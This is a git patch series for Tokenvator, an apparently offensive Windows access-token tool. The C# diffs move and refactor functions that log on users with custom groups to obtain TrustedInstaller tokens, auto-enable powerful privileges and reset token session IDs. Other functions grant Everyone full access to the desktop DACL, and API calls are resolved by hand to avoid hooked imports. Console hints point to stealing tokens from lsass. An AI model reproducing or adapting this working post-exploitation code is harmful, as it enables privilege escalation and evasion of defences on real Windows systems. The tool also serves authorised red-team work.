 namespace Tokenvator.Plugins.AccessTokens
 {
@@ -286,7 +288,7 @@ ref tokenSource
 
             Console.WriteLine();
 
-            using (DesktopACL desktop = new DesktopACL())
+            using (DesktopACL desktop = new DesktopACL(hWorkingToken))
             {
                 desktop.OpenDesktop();
                 desktop.OpenWindow();
@@ -393,7 +395,7 @@ ref ti.tokenSource
                 command = "cmd.exe";
             }
 
-            using (DesktopACL desktop = new DesktopACL())
+            using (DesktopACL desktop = new DesktopACL(hWorkingToken))
             {
                 desktop.OpenDesktop();
                 desktop.OpenWindow();
@@ -413,8 +415,6 @@ ref ti.tokenSource
         ////////////////////////////////////////////////////////////////////////////////
         private bool _CheckPrivileges()
         {
-            bool exists, enabled;
-
             using (TokenInformation ti = new TokenInformation(hWorkingToken))
             {
                 ti.SetWorkingTokenToSelf();
@@ -423,31 +423,13 @@ private bool _CheckPrivileges()
                 // Checks if SeCreateTokenPrivilege is present and enabled on the token
                 // if it present but not enabled on the token, it is automatically enabled
                 ////////////////////////////////////////////////////////////////////////////////
-                if (!ti.CheckTokenPrivilege(Winnt.SE_CREATETOKEN_NAME, out exists, out enabled))
-                {
-                    Console.WriteLine("[-] Check Token Privilege Failed");
-                    return false;
-                }
-                if (!exists)
+                if (!ti.CheckTokenPrivilege(Winnt.SE_CREATETOKEN_NAME))
                 {
                     Console.WriteLine("[-] {0} is not present on the token", Winnt.SE_CREATETOKEN_NAME);
                     Console.WriteLine("[-] Steal_Token lsass cmd.exe");
                     Console.WriteLine("[-] Add_Privilege SeCreateTokenPrivilege");
                     return false;
                 }
-                if (!enabled)
-                {
-                    Console.WriteLine("[-] {0} is not enabled on the token", Winnt.SE_CREATETOKEN_NAME);
-                    Console.WriteLine("[*] Enabling {0} on the token", Winnt.SE_CREATETOKEN_NAME);
-                    using (TokenManipulation tm = new TokenManipulation(hWorkingToken))
-                    {
-                        tm.SetWorkingTokenToSelf();
-                        if (!tm.SetTokenPrivilege(Winnt.SE_CREATETOKEN_NAME, Winnt.TokenPrivileges.SE_PRIVILEGE_ENABLED))
-                        {
-                            return false;
-                        }
-                    }
-                }
                 else
                 {
                     Console.WriteLine("[+] {0} is present and enabled on the token", Winnt.SE_CREATETOKEN_NAME);
@@ -457,31 +439,13 @@ private bool _CheckPrivileges()
                 // Checks if SeSecurityPrivilege is present and enabled on the token
                 // if it present but not enabled on the token, it is automatically enabled
                 ////////////////////////////////////////////////////////////////////////////////
-                if (!ti.CheckTokenPrivilege(Winnt.SE_SECURITY_NAME, out exists, out enabled))
-                {
-                    Console.WriteLine("[-] Check Token Privilege Failed");
-                    return false;
-                }
-                if (!exists)
+                if (!ti.CheckTokenPrivilege(Winnt.SE_SECURITY_NAME))
                 {
                     Console.WriteLine("[-] {0} is not present on the token", Winnt.SE_SECURITY_NAME);
                     Console.WriteLine("[-] This should be present on existing high integrity tokens");
                     Console.WriteLine("[-] Add_Privilege SeCreateTokenPrivilege");
                     return false;
                 }
-                if (!enabled)
-                {
-                    Console.WriteLine("[-] {0} is not enabled on the token", Winnt.SE_SECURITY_NAME);
-                    Console.WriteLine("[*] Enabling {0} on the token", Winnt.SE_SECURITY_NAME);
-                    using (TokenManipulation tm = new TokenManipulation(hWorkingToken))
-                    {
-                        tm.SetWorkingTokenToSelf();
-                        if (!tm.SetTokenPrivilege(Winnt.SE_SECURITY_NAME, Winnt.TokenPrivileges.SE_PRIVILEGE_ENABLED))
-                        {
-                            return false;
-                        }
-                    }
-                }
                 else
                 {
                     Console.WriteLine("[+] {0} is present and enabled on the token", Winnt.SE_CREATETOKEN_NAME);
@@ -1007,6 +971,178 @@ private bool CreateTokenSource(out Winnt._TOKEN_SOURCE tokenSource)
             return true;
         }
 
+        ////////////////////////////////////////////////////////////////////////////////
+        /// <summary>
+        /// Logs on a user to create a new token for that user
+        /// Useful for impersonating NetworkService or LocalService
+        /// </summary>
+        /// <param name="domain"></param>
+        /// <param name="username"></param>
+        /// <param name="password"></param>
+        /// <param name="logonType"></param>
+        /// <param name="command"></param>
+        /// <param name="arguments"></param>
+        ////////////////////////////////////////////////////////////////////////////////
+        [SecurityCritical]
+        [HandleProcessCorruptedStateExceptions]
+        public void LogonUser(string domain, string username, string password, Winbase.LOGON_TYPE logonType, string command, string arguments)
+        {
+            ////////////////////////////////////////////////////////////////////////////////
+            // Call LogonUser - this will trigger a logon event, but is sometimes the better than the alternative
+            // advapi32.LogonUser(username, domain, password, logonType, Winbase.LOGON_PROVIDER.LOGON32_PROVIDER_DEFAULT, out hExistingToken)
+            ////////////////////////////////////////////////////////////////////////////////
+
+            IntPtr hadvapi32 = Generic.GetPebLdrModuleEntry("advapi32.dll");
+            IntPtr hLogonUserW = Generic.GetExportAddress(hadvapi32, "LogonUserW");
+            MonkeyWorks.advapi32.LogonUserW fLogonUserW = (MonkeyWorks.advapi32.LogonUserW)Marshal.GetDelegateForFunctionPointer(hLogonUserW, typeof(MonkeyWorks.advapi32.LogonUserW));
+
+            bool retVal = false;
+            try
+            {
+                retVal = fLogonUserW(username, domain, password, logonType, Winbase.LOGON_PROVIDER.LOGON32_PROVIDER_DEFAULT, out hExistingToken);
+            }
+            catch (Exception ex)
+            {
+                Console.WriteLine("[-] LogonUserW Generated an Exception");
+                Console.WriteLine("[-] {0}", ex.Message);
+                return;
+            }
+
+            if (!retVal)
+            {
+                Misc.GetWin32Error("LogonUserW");
+                return;
+            }
+            Console.WriteLine("[+] Logged On {0}", username.TrimEnd());
+
+            if (Winbase.LOGON_TYPE.LOGON32_LOGON_SERVICE == logonType)
+            {
+                if (!_SetTokenSessionId(Process.GetCurrentProcess().SessionId))
+                {
+                    Console.WriteLine(" [-] Unable to Update Token Session ID, this is likely to cause problems with this token");
+                }
+            }
+
+            using (DesktopACL da = new DesktopACL(hWorkingToken))
+            {
+                da.OpenWindow();
+                da.OpenDesktop();
+            }
+
+            if (string.IsNullOrEmpty(command))
+            {
+                SetWorkingTokenToRemote();
+                ImpersonateUser();
+            }
+            else
+            {
+                //This should probably be handled in class
+                Create createProcess;
+                if (0 == Process.GetCurrentProcess().SessionId)
+                {
+                    createProcess = CreateProcess.CreateProcessWithLogonW;
+                }
+                else
+                {
+                    createProcess = CreateProcess.CreateProcessWithTokenW;
+                }
+
+                createProcess(hExistingToken, command, arguments);
+            }
+        }
+
+        ////////////////////////////////////////////////////////////////////////////////
+        /// <summary>
+        /// Logs on a user to create a new token for that user with custom groups
+        /// Useful for doing things like getting trustedinstaller
+        /// Converted to D/Invoke GetPebLdrModuleEntry/GetExportAddress
+        /// </summary>
+        /// <param name="domain"></param>
+        /// <param name="username"></param>
+        /// <param name="password"></param>
+        /// <param name="groups"></param>
+        /// <param name="logonType"></param>
+        /// <param name="command"></param>
+        /// <param name="arguments"></param>
+        ////////////////////////////////////////////////////////////////////////////////
+        [SecurityCritical]
+        [HandleProcessCorruptedStateExceptions]
+        public void LogonUser(string domain, string username, string password, string groups, Winbase.LOGON_TYPE logonType, string command, string arguments)
+        {
+            ////////////////////////////////////////////////////////////////////////////////
+            // Create the token groups structure
+            ////////////////////////////////////////////////////////////////////////////////
+
+            SetWorkingTokenToSelf();
+
+            Ntifs._TOKEN_GROUPS tokenGroups;
+            Winnt._TOKEN_PRIMARY_GROUP tokenPrimaryGroup;
+            using (CreateTokens ct = new CreateTokens(hWorkingToken))
+            {
+                ct.CreateTokenGroups(domain, username, out tokenGroups, out tokenPrimaryGroup, groups.Split(','));
+            }
+
+            ////////////////////////////////////////////////////////////////////////////////
+            // Call LogonUserExExW which allows us to manually specify the groups
+            // advapi32.LogonUserExExW(username, domain, password, logonType, Winbase.LOGON_PROVIDER.LOGON32_PROVIDER_DEFAULT, ref tokenGroups, out hExistingToken, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero)
+            ////////////////////////////////////////////////////////////////////////////////
+
+            IntPtr hadvapi32 = Generic.GetPebLdrModuleEntry("advapi32.dll");
+            IntPtr hLogonUserExExW = Generic.GetExportAddress(hadvapi32, "LogonUserExExW");
+            MonkeyWorks.advapi32.LogonUserExExW fLogonUserW = (MonkeyWorks.advapi32.LogonUserExExW)Marshal.GetDelegateForFunctionPointer(hLogonUserExExW, typeof(MonkeyWorks.advapi32.LogonUserExExW));
+
+            bool retVal = false;
+            try
+            {
+                retVal = fLogonUserW(username, domain, password, logonType, Winbase.LOGON_PROVIDER.LOGON32_PROVIDER_DEFAULT, ref tokenGroups, out hExistingToken, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero);
+            }
+            catch (Exception ex)
+            {
+                Console.WriteLine("[-] LogonUserExExW Generated an Exception");
+                Console.WriteLine("[-] {0}", ex.Message);
+                return;
+            }
+
+            if (!retVal)
+            {
+                Misc.GetWin32Error("LogonUserExExW");
+                return;
+            }
+            Console.WriteLine("[+] Logged On {0}", username.TrimEnd());
+
+            if (Winbase.LOGON_TYPE.LOGON32_LOGON_SERVICE == logonType)
+            {
+                //Is this needed?
+                SetWorkingTokenToRemote();
+                if (!_SetTokenSessionId(Process.GetCurrentProcess().SessionId))
+                {
+                    Console.WriteLine(" [-] Unable to Update Token Session ID, this is likely to cause problems with this token");
+                }
+            }
+
+            using (DesktopACL da = new DesktopACL(hWorkingToken))
+            {
+                da.OpenWindow();
+                da.OpenDesktop();
+            }
+
+            if (string.IsNullOrEmpty(command))
+            {
+                SetWorkingTokenToRemote();
+                ImpersonateUser();
+            }
+            else
+            {
+                Create createProcess;
+                if (0 == Process.GetCurrentProcess().SessionId)
+                    createProcess = CreateProcess.CreateProcessWithLogonW;
+                else
+                    createProcess = CreateProcess.CreateProcessWithTokenW;
+
+                createProcess(hExistingToken, command, arguments);
+            }
+        }
+
         ////////////////////////////////////////////////////////////////////////////////
         /// <summary>
         /// Looks up the right/privileges assigned to a user / group based on a policy
@@ -1371,5 +1507,68 @@ public static bool InitializeSid(string sddl, ref IntPtr psid)
             Console.WriteLine(" [+] {0,-20} {1}", sddl, accountName);
             return true;
         }
+
+        ////////////////////////////////////////////////////////////////////////////////
+        /// <summary>
+        /// Updates the token session ID to the specified session
+        /// Does this even work?
+        /// Converted to D/Invoke GetPebLdrModuleEntry/GetExportAddress
+        /// </summary>
+        /// <param name="sessionId"></param>
+        /// <returns>Return true if completed without error</returns>
+        ////////////////////////////////////////////////////////////////////////////////
+        [SecurityCritical]
+        [HandleProcessCorruptedStateExceptions]
+        private bool _SetTokenSessionId(int sessionId)
+        {
+            SetWorkingTokenToSelf();
+
+            using (TokenInformation ti = new TokenInformation(hWorkingToken))
+            {
+                ti.SetWorkingTokenToSelf();
+                if (!ti.CheckTokenPrivilege(Winnt.SE_TCB_NAME))
+                {
+                    return false;
+                }
+            }
+
+            Console.WriteLine("[*] Updating Token Session ID to {0}", sessionId);
+
+            ////////////////////////////////////////////////////////////////////////////////
+            // Update the token information to the current Session ID
+            // advapi32.SetTokenInformation(hWorkingToken, Winnt._TOKEN_INFORMATION_CLASS.TokenSessionId, handle.AddrOfPinnedObject(), sizeof(uint));
+            ////////////////////////////////////////////////////////////////////////////////
+            IntPtr hadvapi32 = Generic.GetPebLdrModuleEntry("advapi32.dll");
+            IntPtr hSetTokenInformation = Generic.GetExportAddress(hadvapi32, "SetTokenInformation");
+            MonkeyWorks.advapi32.SetTokenInformation fSetTokenInformation = (MonkeyWorks.advapi32.SetTokenInformation)Marshal.GetDelegateForFunctionPointer(hSetTokenInformation, typeof(MonkeyWorks.advapi32.SetTokenInformation));
+
+            GCHandle handle = GCHandle.Alloc(sessionId, GCHandleType.Pinned);
+            bool retVal = false;
+            try
+            {
+                retVal = fSetTokenInformation(hWorkingToken, Winnt._TOKEN_INFORMATION_CLASS.TokenSessionId, handle.AddrOfPinnedObject(), sizeof(uint));
+            }
+            catch (Exception ex)
+            {
+                Console.WriteLine("[-] NtAdjustPrivilegesToken Generated an Exception");
+                Console.WriteLine("[-] {0}", ex.Message);
+                return false;
+            }
+            finally
+            {
+                if (null != handle && handle.IsAllocated)
+                {
+                    handle.Free();
+                }
+            }
+
+            if (!retVal)
+            {
+                Misc.GetWin32Error("SetTokenInformation");
+                return false;
+            }
+
+            return true;
+        }
     }
 }
diff --git a/Tokenvator/Plugins/AccessTokens/TokenInformation.cs b/Tokenvator/Plugins/AccessTokens/TokenInformation.cs
index 4720c9a..4c6b925 100644
--- a/Tokenvator/Plugins/AccessTokens/TokenInformation.cs
+++ b/Tokenvator/Plugins/AccessTokens/TokenInformation.cs
@@ -655,14 +655,12 @@ public static void ReadSidAndName(IntPtr pointer, out string sid, out string acc
         /// Converted to a mix of D/Invoke Syscalls and GetPebLdrModuleEntry/GetExportAddress
         /// </summary>
         /// <param name="privilegeName"></param>
-        /// <param name="exists"></param>
-        /// <param name="enabled"></param>
         /// <returns></returns>
         ////////////////////////////////////////////////////////////////////////////////
-        public bool CheckTokenPrivilege(string privilegeName, out bool exists, out bool enabled)
+        public bool CheckTokenPrivilege(string privilegeName)
         {
-            exists = false;
-            enabled = false;
+            bool exists = false;
+            bool enabled = false;
 
             IntPtr lpTokenInformation = _GetTokenInformation(Winnt._TOKEN_INFORMATION_CLASS.TokenPrivileges);
 
@@ -752,8 +750,27 @@ public bool CheckTokenPrivilege(string privilegeName, out bool exists, out bool
                     continue;
                 }
                 enabled = Convert.ToBoolean(pfResult);
+                break;
+            }
 
+            if (!exists)
+            {
+                Console.WriteLine("[-] Privileges {0} does not exist on the token");
+                return false;
             }
+
+            if (!enabled)
+            {
+                using(TokenManipulation tm = new TokenManipulation(hWorkingToken))
+                {
+                    if (!tm.SetTokenPrivilege(privilegeName, Winnt.TokenPrivileges.SE_PRIVILEGE_ENABLED))
+                    {
+                        Console.WriteLine("[-] Unable to enable privilege {0}");
+                        return false;
+                    }
+                }
+            }
+
             Console.WriteLine();
             return true;
         }
diff --git a/Tokenvator/Plugins/AccessTokens/TokenManipulation.cs b/Tokenvator/Plugins/AccessTokens/TokenManipulation.cs
index 0f2937d..0de6d0f 100644
--- a/Tokenvator/Plugins/AccessTokens/TokenManipulation.cs
+++ b/Tokenvator/Plugins/AccessTokens/TokenManipulation.cs
@@ -1,11 +1,9 @@
 using System;
 using System.Collections.Generic;
-using System.Diagnostics;
 using System.Runtime.ExceptionServices;
 using System.Runtime.InteropServices;
 using System.Security;
 using System.Security.Principal;
-using System.Text;
 
 using DInvoke.DynamicInvoke;
 
@@ -14,7 +12,7 @@
 using Tokenvator.Plugins.Execution;
 
 using MonkeyWorks.Unmanaged.Headers;
-using MonkeyWorks.Unmanaged.Libraries;
+//using MonkeyWorks.Unmanaged.Libraries;
 
 namespace Tokenvator.Plugins.AccessTokens
 {
@@ -223,172 +221,7 @@ public bool GetTrustedInstaller()
         }
         #endregion
 
-        ////////////////////////////////////////////////////////////////////////////////
-        /// <summary>
-        /// Logs on a user to create a new token for that user
-        /// Useful for impersonating NetworkService or LocalService
-        /// </summary>
-        /// <param name="domain"></param>
-        /// <param name="username"></param>
-        /// <param name="password"></param>
-        /// <param name="logonType"></param>
-        /// <param name="command"></param>
-        /// <param name="arguments"></param>
-        ////////////////////////////////////////////////////////////////////////////////
-        [SecurityCritical]
-        [HandleProcessCorruptedStateExceptions]
-        public void LogonUser(string domain, string username, string password, Winbase.LOGON_TYPE logonType, string command, string arguments)
-        {
-            ////////////////////////////////////////////////////////////////////////////////
-            // Call LogonUser - this will trigger a logon event, but is sometimes the better than the alternative
-            // advapi32.LogonUser(username, domain, password, logonType, Winbase.LOGON_PROVIDER.LOGON32_PROVIDER_DEFAULT, out hExistingToken)
-            ////////////////////////////////////////////////////////////////////////////////
-
-            IntPtr hadvapi32 = Generic.GetPebLdrModuleEntry("advapi32.dll");
-            IntPtr hLogonUserW = Generic.GetExportAddress(hadvapi32, "LogonUserW");
-            MonkeyWorks.advapi32.LogonUserW fLogonUserW = (MonkeyWorks.advapi32.LogonUserW)Marshal.GetDelegateForFunctionPointer(hLogonUserW, typeof(MonkeyWorks.advapi32.LogonUserW));
-
-            bool retVal = false;
-            try
-            {
-                retVal = fLogonUserW(username, domain, password, logonType, Winbase.LOGON_PROVIDER.LOGON32_PROVIDER_DEFAULT, out hExistingToken);
-            }
-            catch (Exception ex)
-            {
-                Console.WriteLine("[-] LogonUserW Generated an Exception");
-                Console.WriteLine("[-] {0}", ex.Message);
-                return;
-            }
-
-            if (!retVal)
-            {
-                Misc.GetWin32Error("LogonUserW");
-                return;
-            }
-            Console.WriteLine("[+] Logged On {0}", username.TrimEnd());
-
-            if (Winbase.LOGON_TYPE.LOGON32_LOGON_SERVICE == logonType)
-            {
-                if (!SetTokenSessionId(Process.GetCurrentProcess().SessionId))
-                {
-                    Console.WriteLine(" [-] Unable to Update Token Session ID, this is likely to cause problems with this token");
-                }
-            }
-
-            if (string.IsNullOrEmpty(command))
-            {
-                SetWorkingTokenToRemote();
-                ImpersonateUser();
-            }
-            else
-            {
-                //This should probably be handled in class
-                Create createProcess;
-                if (0 == Process.GetCurrentProcess().SessionId)
-                {
-                    createProcess = CreateProcess.CreateProcessWithLogonW;
-                }
-                else
-                {
-                    createProcess = CreateProcess.CreateProcessWithTokenW;
-                }
-
-                createProcess(hExistingToken, command, arguments);
-            }
-        }
-
-        ////////////////////////////////////////////////////////////////////////////////
-        /// <summary>
-        /// Logs on a user to create a new token for that user with custom groups
-        /// Useful for doing things like getting trustedinstaller
-        /// Converted to D/Invoke GetPebLdrModuleEntry/GetExportAddress
-        /// </summary>
-        /// <param name="domain"></param>
-        /// <param name="username"></param>
-        /// <param name="password"></param>
-        /// <param name="groups"></param>
-        /// <param name="logonType"></param>
-        /// <param name="command"></param>
-        /// <param name="arguments"></param>
-        ////////////////////////////////////////////////////////////////////////////////
-        [SecurityCritical]
-        [HandleProcessCorruptedStateExceptions]
-        public void LogonUser(string domain, string username, string password, string groups, Winbase.LOGON_TYPE logonType, string command, string arguments)
-        {
-            ////////////////////////////////////////////////////////////////////////////////
-            // Create the token groups structure
-            ////////////////////////////////////////////////////////////////////////////////
-            
-            SetWorkingTokenToSelf();
-
-            Ntifs._TOKEN_GROUPS tokenGroups;
-            Winnt._TOKEN_PRIMARY_GROUP tokenPrimaryGroup;
-            using (CreateTokens ct = new CreateTokens(hWorkingToken))
-            {
-                ct.CreateTokenGroups(domain, username, out tokenGroups, out tokenPrimaryGroup, groups.Split(','));
-            }
-
-            ////////////////////////////////////////////////////////////////////////////////
-            // Call LogonUserExExW which allows us to manually specify the groups
-            // advapi32.LogonUserExExW(username, domain, password, logonType, Winbase.LOGON_PROVIDER.LOGON32_PROVIDER_DEFAULT, ref tokenGroups, out hExistingToken, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero)
-            ////////////////////////////////////////////////////////////////////////////////
-
-            IntPtr hadvapi32 = Generic.GetPebLdrModuleEntry("advapi32.dll");
-            IntPtr hLogonUserExExW = Generic.GetExportAddress(hadvapi32, "LogonUserExExW");
-            MonkeyWorks.advapi32.LogonUserExExW fLogonUserW = (MonkeyWorks.advapi32.LogonUserExExW)Marshal.GetDelegateForFunctionPointer(hLogonUserExExW, typeof(MonkeyWorks.advapi32.LogonUserExExW));
-
-            bool retVal = false;
-            try
-            {
-                retVal = fLogonUserW(username, domain, password, logonType, Winbase.LOGON_PROVIDER.LOGON32_PROVIDER_DEFAULT, ref tokenGroups, out hExistingToken, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero);
-            }
-            catch(Exception ex)
-            {
-                Console.WriteLine("[-] LogonUserExExW Generated an Exception");
-                Console.WriteLine("[-] {0}", ex.Message);
-                return;
-            }
-
-            if (!retVal)
-            {
-                Misc.GetWin32Error("LogonUserExExW");
-                return;
-            }
-            Console.WriteLine("[+] Logged On {0}", username.TrimEnd());
-
-            if (Winbase.LOGON_TYPE.LOGON32_LOGON_SERVICE == logonType)
-            {
-                //Is this needed?
-                SetWorkingTokenToRemote();
-                if (!SetTokenSessionId(Process.GetCurrentProcess().SessionId))
-                {
-                    Console.WriteLine(" [-] Unable to Update Token Session ID, this is likely to cause problems with this token");
-                }
-            }
-
-            using (DesktopACL da = new DesktopACL())
-            {
-                da.OpenWindow();
-                da.OpenDesktop();
-            }
-
-            if (string.IsNullOrEmpty(command))
-            {
-                SetWorkingTokenToRemote();
-                ImpersonateUser();
-            }
-            else
-            {
-                Create createProcess;
-                if (0 == Process.GetCurrentProcess().SessionId)
-                    createProcess = CreateProcess.CreateProcessWithLogonW;
-                else
-                    createProcess = CreateProcess.CreateProcessWithTokenW;
-
-                createProcess(hExistingToken, command, arguments);
-            }
-        }
-
+        #region Alter Privileges
         ////////////////////////////////////////////////////////////////////////////////
         /// <summary>
         /// Can be use to remove groups, adding groups would require a new token
@@ -564,79 +397,6 @@ public bool SetTokenPrivilege(string privilege, Winnt.TokenPrivileges attribute)
             Console.WriteLine(" [+] Privilege State: {0}", attribute);
             return true;
         }
-
-        ////////////////////////////////////////////////////////////////////////////////
-        /// <summary>
-        /// Updates the token session ID to the specified session
-        /// Does this even work?
-        /// Converted to D/Invoke GetPebLdrModuleEntry/GetExportAddress
-        /// </summary>
-        /// <param name="sessionId"></param>
-        /// <returns>Return true if completed without error</returns>
-        ////////////////////////////////////////////////////////////////////////////////
-        [SecurityCritical]
-        [HandleProcessCorruptedStateExceptions]
-        public bool SetTokenSessionId(int sessionId)
-        {
-            bool exists, enabled;
-            SetWorkingTokenToSelf();
-
-            using (TokenInformation ti = new TokenInformation(hWorkingToken))
-            {
-                ti.CheckTokenPrivilege(Winnt.SE_TCB_NAME, out exists, out enabled);
-            }
-
-            if (!exists)
-            {
-                Console.WriteLine("[-] SeTcbPrivilege Does Not Exist On Token");
-                return false;
-            }
-
-            SetWorkingTokenToRemote();
-            if (!enabled && !SetTokenPrivilege(Winnt.SE_TCB_NAME, Winnt.TokenPrivileges.SE_PRIVILEGE_ENABLED))
-            {
-                Console.WriteLine("[-] Enable SeTcbPrivilege Failed ");
-                return false;
-            }
-
-            Console.WriteLine("[*] Updating Token Session ID to {0}", sessionId);
-
-            ////////////////////////////////////////////////////////////////////////////////
-            // Update the token information to the current Session ID
-            // advapi32.SetTokenInformation(hWorkingToken, Winnt._TOKEN_INFORMATION_CLASS.TokenSessionId, handle.AddrOfPinnedObject(), sizeof(uint));
-            ////////////////////////////////////////////////////////////////////////////////
-            IntPtr hadvapi32 = Generic.GetPebLdrModuleEntry("advapi32.dll");
-            IntPtr hSetTokenInformation = Generic.GetExportAddress(hadvapi32, "SetTokenInformation");
-            MonkeyWorks.advapi32.SetTokenInformation fSetTokenInformation = (MonkeyWorks.advapi32.SetTokenInformation)Marshal.GetDelegateForFunctionPointer(hSetTokenInformation, typeof(MonkeyWorks.advapi32.SetTokenInformation));
-
-            GCHandle handle = new GCHandle();
-            handle = GCHandle.Alloc(sessionId, GCHandleType.Pinned);
-            bool retVal = false;
-            try
-            {
-                retVal = fSetTokenInformation(hWorkingToken, Winnt._TOKEN_INFORMATION_CLASS.TokenSessionId, handle.AddrOfPinnedObject(), sizeof(uint));
-            }
-            catch (Exception ex)
-            {
-                Console.WriteLine("[-] NtAdjustPrivilegesToken Generated an Exception");
-                Console.WriteLine("[-] {0}", ex.Message);
-                return false;
-            }
-            finally
-            {
-                if (null != handle && handle.IsAllocated)
-                {
-                    handle.Free();
-                }
-            }
-
-            if (!retVal)
-            {
-                Misc.GetWin32Error("SetTokenInformation");
-                return false;
-            }
-
-            return true;
-        }
+        #endregion
     }
 }
diff --git a/Tokenvator/Plugins/Enumeration/DesktopACL.cs b/Tokenvator/Plugins/Enumeration/DesktopACL.cs
index 0a89977..3f0b2e0 100644
--- a/Tokenvator/Plugins/Enumeration/DesktopACL.cs
+++ b/Tokenvator/Plugins/Enumeration/DesktopACL.cs
@@ -17,23 +17,45 @@ class DesktopACL : IDisposable
         private IntPtr pSid = IntPtr.Zero;
         private IntPtr ppSecurityDescriptor = IntPtr.Zero;
 
+        private IntPtr hToken;
+
+        ////////////////////////////////////////////////////////////////////////////////
         /// <summary>
-        /// 
+        /// Default Constructor
+        /// No Conversions Required
         /// </summary>
-        internal DesktopACL()
+        ////////////////////////////////////////////////////////////////////////////////
+        internal DesktopACL(IntPtr hToken)
         {
             Console.WriteLine("[*] Updating Desktop DACL");
             ptrWinSta0 = Marshal.StringToHGlobalUni("WinSta0");
+            this.hToken = hToken;
         }
 
-
+        ////////////////////////////////////////////////////////////////////////////////
         /// <summary>
+        /// Opens a handle to the window station
         /// 
         /// </summary>
+        ////////////////////////////////////////////////////////////////////////////////
         internal void OpenWindow()
         {
+            using (TokenInformation ti = new TokenInformation(hToken))
+            {
+                ti.SetWorkingTokenToSelf();
+                if (!ti.CheckTokenPrivilege(Winnt.SE_SECURITY_NAME))
+                {
+                    Console.WriteLine("[-] {0} is not present on the token", Winnt.SE_SECURITY_NAME);
+                    return;
+                }
+                else
+                {
+                    Console.WriteLine("[+] {0} is present and enabled on the token", Winnt.SE_SECURITY_NAME);
+                }
+            }
+
             IntPtr hWinStation = user32.OpenWindowStationW(
-                "WinSta0", 
+                ptrWinSta0, 
                 false,
                 Winuser.WindowStationSecurity.ACCESS_SYSTEM_SECURITY
                 | Winuser.WindowStationSecurity.READ_CONTROL
@@ -50,9 +72,11 @@ internal void OpenWindow()
             _SetDACL(hWinStation);
         }
 
+        ////////////////////////////////////////////////////////////////////////////////
         /// <summary>
-        /// 
+        /// Opens a handle to the desktop
         /// </summary>
+        ////////////////////////////////////////////////////////////////////////////////
         internal void OpenDesktop()
         {
             IntPtr hDesktop = user32.OpenDesktopA(
@@ -75,7 +99,9 @@ internal void OpenDesktop()
         /// </summary>
         /// <param name="handle"></param>
         private void _SetDACL(IntPtr handle)
-        { 
+        {
+            ////////////////////////////////////////////////////////////////////////////////
+            //
             ////////////////////////////////////////////////////////////////////////////////
             IntPtr ppsidOwner, ppsidGroup, ppDacl, ppSacl;
             ppsidOwner = ppsidGroup = ppDacl = ppSacl = IntPtr.Zero;
@@ -88,16 +114,20 @@ private void _SetDACL(IntPtr handle)
 
             if (0 != status)
             {
+                Console.WriteLine(status);
                 Misc.GetWin32Error("GetSecurityInfo");
                 return;
             }
-            else if (IntPtr.Zero == ppDacl)
+            
+            if (IntPtr.Zero == ppDacl)
             {
                 Misc.GetWin32Error("ppDacl");
                 return;
             }
             Console.WriteLine(" [+] Recieved DACL : 0x{0}", ppDacl.ToString("X4"));
 
+            ////////////////////////////////////////////////////////////////////////////////
+            // 
             ////////////////////////////////////////////////////////////////////////////////
             uint size = 0;
             advapi32.CreateWellKnownSid(Winnt.WELL_KNOWN_SID_TYPE.WinWorldSid, IntPtr.Zero, IntPtr.Zero, ref size);
@@ -117,7 +147,7 @@ private void _SetDACL(IntPtr handle)
             Console.WriteLine(" [+] Create Everyone Sid - Pass 2 : 0x{0}", pSid.ToString("X4"));
 
             ////////////////////////////////////////////////////////////////////////////////
-            Accctrl._TRUSTEE_W trustee = new Accctrl._TRUSTEE_W
+            Accctrl._TRUSTEE_A trustee = new Accctrl._TRUSTEE_A
             {
                 pMultipleTrustee = IntPtr.Zero,
                 MultipleTrusteeOperation = Accctrl._MULTIPLE_TRUSTEE_OPERATION.NO_MULTIPLE_TRUSTEE,
@@ -126,23 +156,25 @@ private void _SetDACL(IntPtr handle)
                 ptstrName = pSid
             };
 
-            Accctrl._EXPLICIT_ACCESS_W explicitAccess = new Accctrl._EXPLICIT_ACCESS_W
+            Accctrl._EXPLICIT_ACCESS_A explicitAccess = new Accctrl._EXPLICIT_ACCESS_A
             {
-                grfAccessPermissions = Winuser.WindowStationSecurity.WINSTA_ALL_ACCESS, //0xf03ff,
+                grfAccessPermissions = 0xf03ff,
                 grfAccessMode = Accctrl._ACCESS_MODE.GRANT_ACCESS,
-                grfInheritance = Accctrl.Inheritance.SUB_OBJECTS_ONLY_INHERIT, //1,
+                grfInheritance = 1,
                 Trustee = trustee
             };
 
             IntPtr newAcl = new IntPtr();
-            status = advapi32.SetEntriesInAclW(1, ref explicitAccess, ppDacl, ref newAcl);
+            status = advapi32.SetEntriesInAclA(1, ref explicitAccess, ppDacl, ref newAcl);
 
             if (0 != status)
             {
+                Console.WriteLine(status);
                 Misc.GetWin32Error("SetEntriesInAclW");
                 return;
             }
-            else if (IntPtr.Zero == newAcl)
+           
+            if (IntPtr.Zero == newAcl)
             {
                 Misc.GetWin32Error("newAcl");
                 return;
@@ -159,6 +191,7 @@ private void _SetDACL(IntPtr handle)
 
             if (0 != status)
             {
+                Console.WriteLine(status);
                 Misc.GetWin32Error("SetSecurityInfo");
                 return;
             }

From c1099affe6f9566c377c2f9f58c0132df8aa4085 Mon Sep 17 00:00:00 2001
From: Alexander <1656007+0xbadjuju@users.noreply.github.com>
Date: Fri, 10 Sep 2021 10:20:52 -0500
Subject: [PATCH 17/36] Converted UserSessions and DesktopACL to D/Invoke

Simplified many of the UserSession methods to TokenInformation. Modified OpenProcessTokens to reduce GetSyscallStubs.
---
 Tokenvator/MainLoop.Modules.cs                |   3 +-
 .../Plugins/AccessTokens/AccessTokens.cs      |  74 +++-
 .../Plugins/AccessTokens/CreateTokens.cs      |  24 +-
 .../Plugins/AccessTokens/TokenInformation.cs  |  16 +-
 .../Plugins/AccessTokens/TokenManipulation.cs |  81 ++--
 Tokenvator/Plugins/Enumeration/DesktopACL.cs  | 353 +++++++++++----
 .../Plugins/Enumeration/UserSessions.cs       | 416 ++++++++----------
 7 files changed, 585 insertions(+), 382 deletions(-)

diff --git a/Tokenvator/MainLoop.Modules.cs b/Tokenvator/MainLoop.Modules.cs
index ffec114..717fb70 100644
--- a/Tokenvator/MainLoop.Modules.cs
+++ b/Tokenvator/MainLoop.Modules.cs
